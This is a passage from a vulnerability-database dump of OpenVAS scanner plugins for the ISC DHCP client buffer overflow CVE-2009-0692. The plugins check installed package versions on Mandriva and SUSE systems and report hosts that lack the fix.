isrpmvuln(pkg:\"dhcp-relay\", rpm:\"dhcp-relay~4.1.0~5.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-server\", rpm:\"dhcp-server~4.1.0~5.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-client\", rpm:\"dhcp-client~3.0~1.rc14.0.2.C30mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-common\", rpm:\"dhcp-common~3.0~1.rc14.0.2.C30mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~3.0~1.rc14.0.2.C30mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-relay\", rpm:\"dhcp-relay~3.0~1.rc14.0.2.C30mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-server\", rpm:\"dhcp-server~3.0~1.rc14.0.2.C30mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-client\", rpm:\"dhcp-client~3.0.4~2.2.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-common\", rpm:\"dhcp-common~3.0.4~2.2.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~3.0.4~2.2.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-relay\", rpm:\"dhcp-relay~3.0.4~2.2.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-server\", rpm:\"dhcp-server~3.0.4~2.2.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-client\", rpm:\"dhcp-client~3.0~1.rc14.0.2.C30mdk\", rls:\"MNDK_2.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-common\", rpm:\"dhcp-common~3.0~1.rc14.0.2.C30mdk\", rls:\"MNDK_2.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~3.0~1.rc14.0.2.C30mdk\", rls:\"MNDK_2.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-relay\", rpm:\"dhcp-relay~3.0~1.rc14.0.2.C30mdk\", rls:\"MNDK_2.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-server\", rpm:\"dhcp-server~3.0~1.rc14.0.2.C30mdk\", rls:\"MNDK_2.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-26T08:56:04", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n dhcp-client\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5053652 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "cvss3": {}, "published": "2009-10-10T00:00:00", "type": "openvas", "title": "SLES9: Security update for dhcp-client", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-0692"], "modified": "2017-07-11T00:00:00", "id": "OPENVAS:65322", "href": "http://plugins.openvas.org/nasl.php?oid=65322", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5053652.nasl 6666 2017-07-11 13:13:36Z cfischer $\n# Description: Security update for dhcp-client\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n dhcp-client\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5053652 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_id(65322);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2009-0692\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES9: Security update for dhcp-client\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"dhcp-client\", rpm:\"dhcp-client~3.0.1rc13~28.26\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:38:38", "description": "The remote host is missing an update to dhcp\nannounced via advisory MDVSA-2009:151.", "cvss3": {}, "published": "2009-07-29T00:00:00", "type": "openvas", "title": "Mandrake Security Advisory MDVSA-2009:151 (dhcp)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-0692"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231064393", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064393", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_151.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:151 (dhcp)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability has been found and corrected in ISC DHCP:\n\nStack-based buffer overflow in the script_write_params method in\nclient/dhclient.c in ISC DHCP dhclient 4.1 before 4.1.0p1, 4.0\nbefore 4.0.1p1, 3.1 before 3.1.2p1, 3.0, and 2.0 allows remote DHCP\nservers to execute arbitrary code via a crafted subnet-mask option\n(CVE-2009-0692).\n\nThis update provides fixes for this vulnerability.\n\nAffected: 2008.1, 2009.0, 2009.1, Corporate 3.0, Corporate 4.0,\n Multi Network Firewall 2.0\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:151\";\ntag_summary = \"The remote host is missing an update to dhcp\nannounced via advisory MDVSA-2009:151.\";\n\n \n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64393\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2009-0692\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Mandrake Security Advisory MDVSA-2009:151 (dhcp)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"dhcp-client\", rpm:\"dhcp-client~3.0.6~5.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-common\", rpm:\"dhcp-common~3.0.6~5.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~3.0.6~5.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-doc\", rpm:\"dhcp-doc~3.0.6~5.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-relay\", rpm:\"dhcp-relay~3.0.6~5.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-server\", rpm:\"dhcp-server~3.0.6~5.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-client\", rpm:\"dhcp-client~3.0.7~1.3mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-common\", rpm:\"dhcp-common~3.0.7~1.3mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~3.0.7~1.3mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-doc\", rpm:\"dhcp-doc~3.0.7~1.3mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-relay\", rpm:\"dhcp-relay~3.0.7~1.3mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-server\", rpm:\"dhcp-server~3.0.7~1.3mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-client\", rpm:\"dhcp-client~4.1.0~5.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-common\", rpm:\"dhcp-common~4.1.0~5.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~4.1.0~5.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-doc\", rpm:\"dhcp-doc~4.1.0~5.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-relay\", rpm:\"dhcp-relay~4.1.0~5.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-server\", rpm:\"dhcp-server~4.1.0~5.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-client\", rpm:\"dhcp-client~3.0~1.rc14.0.2.C30mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-common\", rpm:\"dhcp-common~3.0~1.rc14.0.2.C30mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~3.0~1.rc14.0.2.C30mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-relay\", rpm:\"dhcp-relay~3.0~1.rc14.0.2.C30mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-server\", rpm:\"dhcp-server~3.0~1.rc14.0.2.C30mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-client\", rpm:\"dhcp-client~3.0.4~2.2.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-common\", rpm:\"dhcp-common~3.0.4~2.2.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~3.0.4~2.2.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-relay\", rpm:\"dhcp-relay~3.0.4~2.2.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-server\", rpm:\"dhcp-server~3.0.4~2.2.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-client\", rpm:\"dhcp-client~3.0~1.rc14.0.2.C30mdk\", rls:\"MNDK_2.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-common\", rpm:\"dhcp-common~3.0~1.rc14.0.2.C30mdk\", rls:\"MNDK_2.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~3.0~1.rc14.0.2.C30mdk\", rls:\"MNDK_2.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-relay\", rpm:\"dhcp-relay~3.0~1.rc14.0.2.C30mdk\", rls:\"MNDK_2.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-server\", rpm:\"dhcp-server~3.0~1.rc14.0.2.C30mdk\", rls:\"MNDK_2.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-26T08:55:41", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n dhcp\n dhcp-client\n dhcp-devel\n dhcp-relay\n dhcp-server\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 10 patch database located at\nhttp://download.novell.com/patch/finder/", "cvss3": {}, "published": "2009-10-13T00:00:00", "type": "openvas", "title": "SLES10: Security update for dhclient", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-0692"], "modified": "2017-07-11T00:00:00", "id": "OPENVAS:65772", "href": "http://plugins.openvas.org/nasl.php?oid=65772", "sourceData": "#\n#VID slesp2-dhcp-6335\n# OpenVAS Vulnerability Test\n# $\n# Description: Security update for dhclient\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n dhcp\n dhcp-client\n dhcp-devel\n dhcp-relay\n dhcp-server\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 10 patch database located at\nhttp://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n\nif(description)\n{\n script_id(65772);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-13 18:25:40 +0200 (Tue, 13 Oct 2009)\");\n script_cve_id(\"CVE-2009-0692\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES10: Security update for dhclient\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"dhcp\", rpm:\"dhcp~3.0.3~23.55\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-client\", rpm:\"dhcp-client~3.0.3~23.55\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~3.0.3~23.55\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-relay\", rpm:\"dhcp-relay~3.0.3~23.55\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-server\", rpm:\"dhcp-server~3.0.3~23.55\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:40:18", "description": "This host has installed ISC DHCP Client and is prone to Buffer\n overflow Vulnerability.", "cvss3": {}, "published": "2009-07-23T00:00:00", "type": "openvas", "title": "ISC DHCP Client Buffer Overflow Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-0692"], "modified": "2019-05-17T00:00:00", "id": "OPENVAS:1361412562310900694", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310900694", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# ISC DHCP Client Buffer Overflow Vulnerability\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.900694\");\n script_version(\"2019-05-17T13:14:58+0000\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 13:14:58 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2009-07-23 21:05:26 +0200 (Thu, 23 Jul 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2009-0692\");\n script_bugtraq_id(35668);\n script_name(\"ISC DHCP Client Buffer Overflow Vulnerability\");\n script_xref(name:\"URL\", value:\"https://www.isc.org/node/468\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/35785\");\n script_xref(name:\"URL\", value:\"http://www.kb.cert.org/vuls/id/410676\");\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2009/1891\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version_unreliable\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"secpod_isc_dhcp_client_detect.nasl\", \"gather-package-list.nasl\");\n script_mandatory_keys(\"ISC/DHCP-Client/Ver\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation allows attackers to run arbitrary code, corrupt memory,\n and can cause denial of service.\");\n\n script_tag(name:\"affected\", value:\"ISC DHCP dhclient 4.1 before 4.1.0p1\n\n ISC DHCP dhclient 4.0 before 4.0.1p1\n\n ISC DHCP dhclient 3.1 before 3.1.2p1\n\n ISC DHCP dhclient all versions in 3.0\n\n and 2.0 series.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to a boundary error within the 'script_write_params()'\n function in 'client/dhclient.c' which can be exploited to cause a stack-based\n buffer overflow by sending an overly long subnet-mask option.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to version 4.1.0p1, 4.0.1p1, or 3.1.2p1 or later.\");\n\n script_tag(name:\"summary\", value:\"This host has installed ISC DHCP Client and is prone to Buffer\n overflow Vulnerability.\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n#RHEL 5 not affected by this vulnerability\nif(release && release == \"RHENT_5\"){\n exit(0);\n}\n\ndhcpVer = get_kb_item(\"ISC/DHCP-Client/Ver\");\nif(!dhcpVer){\n exit(0);\n}\n\nif(dhcpVer =~ \"^4\\.1\")\n{\n if(version_is_less(version:dhcpVer, test_version:\"4.1.0.p1\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n}\n\nelse if(dhcpVer =~ \"^4\\.0\")\n{\n if(version_is_less(version:dhcpVer, test_version:\"4.0.1.p1\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n}\n\nelse if(dhcpVer =~ \"^3\\.1\")\n{\n if(version_is_less(version:dhcpVer, test_version:\"3.1.2.p1\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n}\n\nelse if((dhcpVer =~ \"^3\\.0\") || (dhcpVer =~ \"^2\\.0\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-04-06T11:40:39", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n dhcp-client\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 11 patch database located at\nhttp://download.novell.com/patch/finder/", "cvss3": {}, "published": "2009-10-11T00:00:00", "type": "openvas", "title": "SLES11: Security update for dhcp-client", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-0692"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231065690", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065690", "sourceData": "#\n#VID 8344cd148acb6a76268d2b1462cf9a03\n# OpenVAS Vulnerability Test\n# $\n# Description: Security update for dhcp-client\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n dhcp-client\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 11 patch database located at\nhttp://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://bugzilla.novell.com/show_bug.cgi?id=515599\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.65690\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-11 22:58:51 +0200 (Sun, 11 Oct 2009)\");\n script_cve_id(\"CVE-2009-0692\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES11: Security update for dhcp-client\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"dhcp-client\", rpm:\"dhcp-client~3.1.1~7.13.1\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:04", "description": "The remote host is missing updates announced in\nadvisory GLSA 200808-05.", "cvss3": {}, "published": "2008-09-24T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200808-05 (dhcp)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0062"], "modified": 